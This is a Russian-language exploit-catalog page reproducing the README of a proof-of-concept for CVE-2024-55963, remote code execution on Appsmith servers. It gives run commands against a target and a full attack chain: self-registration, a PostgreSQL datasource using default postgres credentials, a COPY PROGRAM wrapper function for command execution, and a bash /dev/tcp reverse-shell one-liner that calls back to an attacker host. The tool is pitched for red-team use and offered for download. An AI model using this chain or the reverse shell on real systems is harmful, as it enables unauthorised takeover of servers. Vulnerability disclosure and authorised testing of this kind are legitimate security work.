Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-55963 — CVE-2024-55963 позволяет неаутентифицированное удалённое выполнение кода на платформе Appsmith Enterprise из-за некорректно сконфигурированной базы данных PostgreSQL, включённой по умолчанию. | Kitploit
Инструменты/GitHubGitHub/superswan/cve-2024-55963
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеНеправильная КонфигурацияRed TeamingБезопасность Баз Данных
GitHubsuperswan/cve-2024-55963

CVE-2024-55963

CVE-2024-55963 позволяет неаутентифицированное удалённое выполнение кода на платформе Appsmith Enterprise из-за некорректно сконфигурированной базы данных PostgreSQL, включённой по умолчанию.

241 год назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE‑2024‑55963 Appsmith RCE PoC

PoC‑эксплойт для CVE‑2024‑55963, который выполняет произвольные команды или запускает reverse shell на уязвимых экземплярах Appsmith.

Он автоматически обрабатывает как современные серверы (с функцией environmentId), так и гораздо более старые «legacy» сборки, которые появились до неё, поэтому вы можете использовать один скрипт для всех версий от v1.20 до последней уязвимой версии v1.51.


Быстрый старт

root@kitploit:~
# Выполнить произвольную команду (по умолчанию — `id`)
python3 appsmith-rce.py https://target.example.com [email protected] password123 "whoami"

# Запустить reverse shell
python3 appsmith-rce.py https://target.example.com [email protected] password123 -revshell <ip> <port>

Примечание: Подойдут любые учётные данные, если сервер разрешает самостоятельную регистрацию. Скрипт сначала пытается выполнить вход, а если аккаунт не существует — переключается на регистрацию.


Как это работает (на высоком уровне)

  1. Обработка CSRF и сессий – извлекает токен из нескольких возможных эндпоинтов или из cookie‑хранилища, а затем использует его в дальнейшем.
  2. Процесс входа/регистрации – выполняет вход или регистрирует нового пользователя с указанными email / паролем.
  • Поиск рабочей области – получает существующую рабочую область или запускает процесс онбординга для автоматического создания новой.
  • Определение окружения – выполняет запрос к /api/v1/environments/workspaces/{id}; если он недоступен, переключается в legacy‑режим (пустой environmentId).
  • Настройка приложения и страницы – отправляет POST‑запрос к /api/v1/applications и извлекает pageId.
  • Создание источника данных – создаёт локальный источник данных PostgreSQL, указывающий на localhost:5432 с учётными данными postgres/postgres (разрешено уязвимым pg_hba.conf по умолчанию).
  • SQL‑объекты – загружает вспомогательную функцию PL/pgSQL exec_cmd() и временную таблицу cmd_output для сбора STDOUT.
  • Выполнение команд – запускает SELECT * FROM exec_cmd('<ваша команда>') через эндпоинт /api/v1/actions/execute.
  • Reverse shell (опционально) – выполняет bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'.

  • Требования

    • Python ≥ 3.8
    • requests

    Протестированные версии

    Версия AppsmithРезультат
    1.51✅ RCE
    1.45✅ RCE
    1.30✅ RCE, legacy‑путь
    1.52+❌ Исправлено – создание функции не работает

    Отличия от PoC Rhino Security Labs

    Этот PoC является своего рода улучшением эксплойта Rhino Security Labs (я не знал, что у них уже есть публичный PoC, когда просматривал исследование).

    PoC от Rhino использует статические заголовки, cookie и учётные данные. При тестировании этого эксплойта у меня возникали проблемы, когда аккаунт уже существовал в конкретных версиях. Этот скрипт позволяет пользователю указать любую комбинацию email/пароль из командной строки. Как уже упоминалось, CSRF‑токен извлекается, а не берётся из жёстко заданных значений.

    • Эта версия работает на старых серверах, где нет эндпоинта Environments API.
    • Путь выполнения отличается. Здесь используется COPY PROGRAM внутри PL/pgSQL‑обёртки exec_cmd() и API /actions/execute, но это, возможно, более шумно. Rhino полагается на встроенный эндпоинт предпросмотра схемы для выполнения ad‑hoc COPY (SELECT …). Этот эндпоинт обрезает длину вывода и добавляет дополнительные правила экранирования, поэтому длинные команды или связанные пейлоады передавать сложнее.
    • Один флаг для reverse shell (:
    • Случайные имена приложения/источника данных/функции
    • Нет зависимости pyfiglet
    • Поддержка старых серверов за счёт автоматического определения заголовка environmentId. Эксплойт Rhino предполагает, что он присутствует всегда.

    Вместе эти проектные решения делают эксплойт короче, надёжнее и удобнее для red‑team использования, при этом демонстрируя ту же базовую уязвимость.

    Ссылки

    rhinosecuritylabs.com


    Правовое уведомление

    Этот код предоставляется только для образовательных целей и авторизованного тестирования. Запуск его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, вероятно, является незаконным. Авторы не несут ответственности за неправомерное использование.

    Скачать инструмент